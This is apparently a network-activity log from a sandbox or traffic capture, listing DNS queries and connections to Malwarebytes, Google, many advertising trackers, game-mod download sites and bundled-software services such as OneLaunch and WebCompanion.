| US | 8.8.8.8:53 | 235.168.82.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | versionhistory.googleapis.com | udp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 8.8.8.8:53 | links.malwarebytes.com | udp |
| NL | 52.222.139.22:443 | links.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | iris.mwbsys.com | udp |
| US | 18.210.137.246:443 | iris.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 22.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod-www.malwarebytes.com | udp |
| US | 18.239.94.92:443 | prod-www.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 246.137.210.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.94.239.18.in-addr.arpa | udp |
| NL | 142.250.102.157:443 | stats.g.doubleclick.net | udp |
| US | 216.239.36.181:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | privacyportal.onetrust.com | udp |
| US | 104.18.28.38:443 | privacyportal.onetrust.com | tcp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 253.161.214.34.in-addr.arpa | udp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 8.8.8.8:53 | keystone.mwbsys.com | udp |
| US | 34.198.90.127:443 | keystone.mwbsys.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 34.231.233.183:443 | sirius.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 183.233.231.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | crl.comodoca.com | udp |
| US | 104.18.15.101:80 | crl.comodoca.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 88.221.169.152:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 101.15.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.14.18.104.in-addr.arpa | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 152.169.221.88.in-addr.arpa | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | lic-iris-content-prod.mwbsys.com | udp |
| US | 18.65.39.7:443 | lic-iris-content-prod.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 7.39.65.18.in-addr.arpa | udp |
| US | 18.65.39.7:443 | lic-iris-content-prod.mwbsys.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| US | 64.233.183.94:443 | beacons2.gvt2.com | tcp |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 64.233.183.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 94.183.233.64.in-addr.arpa | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 34.231.233.183:443 | sirius.mwbsys.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 9minecraft.net | udp |
| US | 172.67.68.180:443 | 9minecraft.net | tcp |
| US | 172.67.68.180:443 | 9minecraft.net | tcp |
| US | 8.8.8.8:53 | www.9minecraft.net | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 8.8.8.8:53 | 180.68.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| NL | 172.217.168.238:443 | cse.google.com | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| NL | 142.251.36.2:443 | partner.googleadservices.com | tcp |
| US | 8.8.8.8:53 | 238.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.251.142.in-addr.arpa | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | tcp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| NL | 172.217.168.238:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| NL | 142.250.179.194:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| NL | 142.251.36.46:443 | clients1.google.com | tcp |
| NL | 142.251.36.46:443 | clients1.google.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| US | 8.8.8.8:53 | dclk-match.dotomi.com | udp |
| US | 8.8.8.8:53 | aep.mxptint.net | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| NL | 89.207.16.140:443 | dclk-match.dotomi.com | tcp |
| US | 38.98.69.175:443 | aep.mxptint.net | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 8.8.8.8:53 | fksnk.com | udp |
| US | 104.18.25.173:443 | a.tribalfusion.com | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 8.8.8.8:53 | ius.ctnsnet.com | udp |
| US | 34.196.242.43:443 | fksnk.com | tcp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 35.186.193.173:443 | ius.ctnsnet.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 34.196.242.43:443 | fksnk.com | tcp |
| US | 35.186.193.173:443 | ius.ctnsnet.com | tcp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | tcp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.69.98.38.in-addr.arpa | udp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 173.25.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.242.196.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| NL | 142.250.179.134:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | 216.39.80.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.210.89.185.in-addr.arpa | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | px.owneriq.net | udp |
| US | 104.18.25.173:443 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | s.uuidksinc.net | udp |
| US | 8.8.8.8:53 | dsp.adkernel.com | udp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| FR | 23.220.11.204:443 | px.owneriq.net | tcp |
| US | 174.137.133.49:443 | dsp.adkernel.com | tcp |
| RU | 213.180.193.90:443 | an.yandex.ru | tcp |
| NL | 185.196.197.130:443 | s.uuidksinc.net | tcp |
| US | 8.8.8.8:53 | 134.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.11.220.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.197.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.193.180.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.133.137.174.in-addr.arpa | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | mts0.google.com | udp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | pm.w55c.net | udp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| DK | 37.157.4.28:443 | c1.adform.net | tcp |
| US | 192.184.69.201:443 | cms.quantserve.com | tcp |
| NL | 35.204.158.49:443 | um.simpli.fi | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| DE | 52.28.142.138:443 | pm.w55c.net | tcp |
| NL | 185.29.134.248:443 | sync.mathtag.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 192.184.69.201:443 | cms.quantserve.com | tcp |
| DE | 52.28.142.138:443 | pm.w55c.net | tcp |
| NL | 185.29.134.248:443 | sync.mathtag.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 35.204.158.49:443 | um.simpli.fi | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| NL | 142.250.179.134:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 28.4.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.158.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.134.29.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.142.28.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.86.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.69.184.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | tcp |
| US | 35.211.178.172:443 | x.bidswitch.net | tcp |
| US | 64.202.112.31:443 | b1sync.zemanta.com | tcp |
| US | 64.202.112.31:443 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.211.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | widget.us.criteo.com | udp |
| US | 74.119.119.150:443 | widget.us.criteo.com | tcp |
| US | 8.8.8.8:53 | 31.112.202.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 192.132.33.46:443 | bttrack.com | tcp |
| US | 192.132.33.46:443 | bttrack.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 150.119.119.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.33.132.192.in-addr.arpa | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.50.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iris.mwbsys.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 3.234.104.16:443 | iris.mwbsys.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| IN | 142.250.183.131:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | apkmodget-com.webpkgcache.com | udp |
| DE | 172.217.23.193:443 | apkmodget-com.webpkgcache.com | tcp |
| IN | 142.250.183.131:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 193.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.183.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | happymod.com | udp |
| US | 104.21.61.7:443 | happymod.com | tcp |
| US | 104.21.61.7:443 | happymod.com | tcp |
| US | 104.21.61.7:443 | happymod.com | udp |
| US | 8.8.8.8:53 | 7.61.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rating.happymod.com | udp |
| US | 8.8.8.8:53 | i.git99.com | udp |
| US | 188.114.96.0:443 | i.git99.com | tcp |
| US | 8.8.8.8:53 | play-lh.googleusercontent.com | udp |
| DE | 172.217.23.214:443 | play-lh.googleusercontent.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e2c29.gcp.gvt2.com | udp |
| US | 34.106.86.104:443 | e2c29.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 104.86.106.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | official.happymod.com | udp |
| US | 8.8.8.8:53 | topdata.downloadatoz.com | udp |
| US | 104.21.235.147:443 | topdata.downloadatoz.com | tcp |
| US | 8.8.8.8:53 | s4-webhot-r-4-c.happymod.com | udp |
| US | 172.67.204.131:443 | s4-webhot-r-4-c.happymod.com | tcp |
| US | 8.8.8.8:53 | 147.235.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 22.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| NL | 142.251.36.6:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | jnn-pa.googleapis.com | tcp |
| NL | 142.251.36.42:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 6.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wizcase.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 172.66.43.53:443 | www.wizcase.com | tcp |
| US | 172.66.43.53:443 | www.wizcase.com | tcp |
| US | 8.8.8.8:53 | 53.43.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wsknow.net | udp |
| US | 147.182.190.109:443 | wsknow.net | tcp |
| US | 8.8.8.8:53 | 109.190.182.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 204.79.197.200:443 | bat.bing.com | tcp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 162.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| NL | 142.250.179.194:443 | www.googletagservices.com | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| NL | 142.251.36.34:443 | ade.googlesyndication.com | udp |
| US | 34.98.64.218:443 | us-u.openx.net | tcp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.teads.tv | udp |
| DE | 88.221.169.49:443 | sync.teads.tv | tcp |
| US | 34.98.64.218:443 | us-u.openx.net | udp |
| DE | 88.221.169.49:443 | sync.teads.tv | tcp |
| US | 8.8.8.8:53 | s.cdnsynd.com | udp |
| NL | 142.250.179.134:443 | s0.2mdn.net | udp |
| IE | 34.251.154.165:443 | s.cdnsynd.com | tcp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 104.18.25.173:443 | s.tribalfusion.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 35.211.178.172:443 | x.bidswitch.net | tcp |
| IE | 52.215.35.25:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 54.224.144.126:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | 49.169.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.154.251.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.35.215.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.144.224.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | launcher.mojang.com | udp |
| US | 13.107.246.67:443 | launcher.mojang.com | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | dclk-match.dotomi.com | udp |
| US | 8.8.8.8:53 | tr.blismedia.com | udp |
| US | 34.96.105.8:443 | tr.blismedia.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | a.rfihub.com | udp |
| US | 192.184.69.215:443 | cms.quantserve.com | tcp |
| NL | 193.0.160.131:443 | a.rfihub.com | tcp |
| NL | 64.158.223.137:443 | dclk-match.dotomi.com | tcp |
| NL | 64.158.223.137:443 | dclk-match.dotomi.com | tcp |
| NL | 193.0.160.131:443 | a.rfihub.com | tcp |
| US | 8.8.8.8:53 | 67.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.105.96.34.in-addr.arpa | udp |
| US | 74.119.119.150:443 | widget.us.criteo.com | tcp |
| US | 34.96.105.8:443 | tr.blismedia.com | udp |
| US | 8.8.8.8:53 | 215.69.184.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.223.158.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b7b52.playfabapi.com | udp |
| US | 20.42.151.134:443 | b7b52.playfabapi.com | tcp |
| US | 8.8.8.8:53 | geteasypdf.com | udp |
| US | 172.67.186.30:443 | geteasypdf.com | tcp |
| US | 172.67.186.30:443 | geteasypdf.com | tcp |
| US | 8.8.8.8:53 | www.googleoptimize.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 172.67.186.30:443 | geteasypdf.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | www.trckolprtnr.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 172.67.194.34:443 | www.trckolprtnr.com | tcp |
| US | 8.8.8.8:53 | 134.151.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.186.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.194.67.172.in-addr.arpa | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | attribution.downloadonelaunch.com | udp |
| NL | 52.222.139.33:443 | attribution.downloadonelaunch.com | tcp |
| US | 8.8.8.8:53 | 33.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| US | 172.67.186.30:443 | geteasypdf.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 155.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | downloadonelaunch.com | udp |
| US | 188.114.96.0:443 | downloadonelaunch.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | attribution.onelaunch.com | udp |
| DE | 143.204.215.53:443 | attribution.onelaunch.com | tcp |
| US | 8.8.8.8:53 | update.onelaunch.com | udp |
| US | 104.26.13.224:443 | update.onelaunch.com | tcp |
| US | 8.8.8.8:53 | 53.215.204.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.keen.io | udp |
| US | 34.214.72.61:443 | api.keen.io | tcp |
| US | 8.8.8.8:53 | 224.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.mixpanel.com | udp |
| US | 35.186.241.51:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | 61.72.214.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.241.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | release-cdn.onelaunch.com | udp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 8.8.8.8:53 | weareskids.net | udp |
| US | 188.114.97.0:443 | weareskids.net | tcp |
| US | 188.114.97.0:443 | weareskids.net | tcp |
| US | 8.8.8.8:53 | wearedevs.net | udp |
| US | 104.26.7.147:443 | wearedevs.net | tcp |
| US | 104.26.7.147:443 | wearedevs.net | udp |
| US | 8.8.8.8:53 | cdn.wearedevs.net | udp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.7.26.104.in-addr.arpa | udp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| US | 34.214.72.61:443 | api.keen.io | tcp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | api.mixpanel.com | udp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| US | 104.18.25.173:443 | s.tribalfusion.com | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| NL | 142.251.36.34:443 | ade.googlesyndication.com | udp |
| US | 74.119.119.150:443 | widget.us.criteo.com | tcp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 8.8.8.8:53 | 25.25.190.35.in-addr.arpa | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 188.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | free.webcompanion.com | udp |
| US | 45.63.66.114:443 | free.webcompanion.com | tcp |
| US | 45.63.66.114:443 | free.webcompanion.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 45.63.66.114:443 | free.webcompanion.com | tcp |
| US | 45.63.66.114:443 | free.webcompanion.com | tcp |
| US | 45.63.66.114:443 | free.webcompanion.com | tcp |
| US | 8.8.8.8:53 | 114.66.63.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.169.114:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 114.169.18.104.in-addr.arpa | udp |
| US | 45.63.66.114:443 | free.webcompanion.com | tcp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 13.107.246.67:443 | www.clarity.ms | tcp |
| US | 104.18.169.114:443 | cdn.cookielaw.org | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.29.38:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | 38.29.18.104.in-addr.arpa | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| IE | 68.219.88.97:443 | c.clarity.ms | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 156.124.96.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacyportal-eu.onetrust.com | udp |
| US | 104.18.28.38:443 | privacyportal-eu.onetrust.com | tcp |
| US | 8.8.8.8:53 | webcompanion.com | udp |
| US | 104.18.212.25:443 | webcompanion.com | tcp |
| US | 104.18.212.25:443 | webcompanion.com | tcp |
| US | 8.8.8.8:53 | 25.212.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geo.lavasoft.com | udp |
| US | 104.17.9.52:80 | geo.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 52.9.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | featureflags.lavasoft.com | udp |
| US | 104.17.9.52:443 | featureflags.lavasoft.com | tcp |
| US | 8.8.8.8:53 | flwadw.com | udp |
